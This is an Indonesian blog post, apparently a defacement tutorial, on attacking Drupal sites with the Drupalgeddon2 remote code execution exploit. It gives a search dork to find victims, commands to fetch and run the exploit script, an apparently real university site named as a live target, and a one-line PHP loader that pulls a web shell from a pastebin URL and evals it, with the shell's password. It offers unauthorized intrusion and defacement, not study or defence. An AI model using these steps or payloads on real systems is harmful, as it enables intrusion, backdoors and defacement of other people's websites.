Drupal Geddon - RCE (Remote Code Execution) - Om Heker

Thursday, August 22, 2019

Drupal Geddon - RCE (Remote Code Execution)

Baca Juga

drpl

Halo guys...Kali ini OMheker akan membagikan Tutorial Deface Menggunakan metode Drupal Geddon - RCE (Remote Code Execution) Ya langsung saja :

Dork : intext:"powered by drupal" (kembangkan)

Buka Termux/Terminal :

pkg install git
gem install ruby
github.com/dreadlocked/Drupalgeddon2

Buka Folder nya :


cd  Drupalgeddon2

Cara menjalankan nya :


ruby drupalgeddon2.rb target.com

Contoh live :


ruby drupalgeddon2.rb http://school.unklab.ac.id
Jika berhasil, web tersebut akan connect ke terminal kalian.


IMG_20180423_152330

Cek lah dengan perintah


uname -a


IMG_20180423_152652

 Jika muncul kernel nya berarti berhasil.

Langsung saja kita upload shell kita , disini saya menggunakan shell LamonganXploiter, kalian juga bisa mengubah shell nya, cara upload nya kalian hanya tinggal ketik :


echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php

Setelah terupload langsung saja kita cek shell kita di site.com/shell.php

Note*
Password Shell LAX adalah " LAX "

Mudah bukan?, Sampai Jumpa :D





Penulusuran terkait:
drupal rce
drupal rce exploit and upload shell
drupal exploit

drupalgeddon2 rb
deface drupal rce
cara deface dengan drupal rce
Comments


EmoticonEmoticon